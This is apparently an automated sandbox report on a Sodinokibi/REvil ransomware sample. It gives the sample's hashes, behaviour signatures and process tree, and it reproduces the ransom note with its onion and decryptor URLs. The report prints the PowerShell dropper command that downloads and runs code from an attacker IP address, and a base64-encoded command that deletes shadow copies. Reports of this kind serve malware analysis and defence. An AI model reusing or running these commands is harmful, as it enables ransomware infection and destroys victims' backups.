Analysis

  • max time kernel
    139s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    17-05-2020 19:10

General

  • Target

    8b2ade35891baaef15ef7a7670b22a8b.bat

  • Size

    221B

  • MD5

    ae1d5d2c71f6e5d19efa142f75f7411a

  • SHA1

    f644c336bd882f8c23cb39b3cc008ce556cad0c6

  • SHA256

    467fc34c41ce35f920d6b34e72bf58ea3a4081a032d12ed77448d9a35363d589

  • SHA512

    9647aede24a87f35b7557c6c40d92ff2d6b13ccdcce16b9c81f4c9b511e19e6319413882b4432793118fa8a36e0ea7624aac5950b6248b2415ebcd6e3533e586

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/8b2ade35891baaef15ef7a7670b22a8b

Extracted

Path

C:\ocf51tv-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and stolen, we already have 250gb your files. You can check it: all files on your system has extension ocf51tv. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/70EB2E2BC338F3D3 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/70EB2E2BC338F3D3 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9Ex1tSavcmbisDWNH7kxfnqb2WS3QJjS/BiJoVV5IMfy5pb5svVu+7HbrNkolDUu XPPBnYb+ViiQRGc12rBa4bq6vN+7NCLTJSo10oXLJMiijCyED8ilSoyZ9WiZCDhL GLdxU+Wz+d0Vwt322teIj7bCrqPBOafMBVuKuxDmZcgtaX7HaA3M0/ee95SRbnAn y/NkXM/t6hB6b9xDXA0CuoE6KRBrrGPglF/l4Vfh0t7YPgb8PtlsNuVR+JCa9O5H La7ZxmR0DJMZ4fNY7ouUrW/d9/rJKuUmAoh//JGPbNl8Vp/m1uJtaA0e5z27EBv2 pgWsRdgCCs74aG3UWw6SH3ZFqkGS1/tM07UfZNBboFzpXyAGXVDoGct3n9Mh4E20 QCr/h6QlFNuyaXzGDiWmyBE0b+nzS+woF5PtAuElbbXlLak/fWa9xGbhx4iVFJxE NrUsGDP9Rp6jco3xcjDodT3RqKszOrvIQ7NRW7GvAqGSCxeTS8mtDx2SoGzPbK2Y oLhJdm9PjQ07qeY5+I1JOP10LKfrTiVk8Qjgh5UhD8sXAYIcy2fpJMUrjB+t22VH +6+J9Hc/M77rDQ2vdwPBfVZ92DYP8W6C8Gl0CV4k1SmAARpjVPSHsn20vJbJybHG QcjELMXumwvOiehH5YeEe+uQ+VAec27NgqTe23c4MGu8KyOwDmEz098LPeZy7Kej uzlQCTA4IOwvT8gncqcGHRon1eJ5bx9iwUyTAefoLPSyQe8wt7mPoj5k/Ii6JbkW EamKJRW6T92MCtcwj+mIz/0Un8cdkRlJ8tcLZBNcTnWOnzyhL+sK6DG9BDUpZ8mD yBMPf/5smLoB7OT5dbLVUNhBmbAu7mHietKeUVbEbo9hPrW7XCLw5MGav6GqUDWU BOBlO7RslM3Eiibv4niNhJFtIc07QetGk9fUYfb5P18kvmbOGq2NGC9YAkE9X6aq c7+7kr+cNrErmTm2iC1CK57JTomo/jkxK7FcLeKre2zLjvEUhLc9+9smhGl8sPcZ 7H608sEyIyLeJdVzkVxv6slNxK1+AkOAZf3S1N/t0jXmg2pzqU6xSUNJ5QODsYqp RnXhvdqIkQPOwU/OfNJZRIFHY60OCxZodH7atgsFpfdZwKUaU3fn3COvl8ATIlJR 8tVfVmBcQe89RrSo2uuhLuNKkzwMYShJ7E60X/+Lop9mk15qU36wSV7xFbsoq0wB JOSoR6RHny/U2AZD/397Lohuvzj+1xHfoeu5r4j7Cwr8DLCRwnMwczAwXdJFqunl +37Oc+eITpj/8RuhA1eOKqD8GHxUqQbSsS1WMcK6iKaKFQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/70EB2E2BC338F3D3

http://decryptor.cc/70EB2E2BC338F3D3

Signatures

  • Blacklisted process makes network request 186 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\8b2ade35891baaef15ef7a7670b22a8b.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8b2ade35891baaef15ef7a7670b22a8b');Invoke-GZDKNPZKBPXNDW;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1472
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1048
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1868

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1472-12-0x0000000008F20000-0x00000000092A5000-memory.dmp

    Filesize

    3.5MB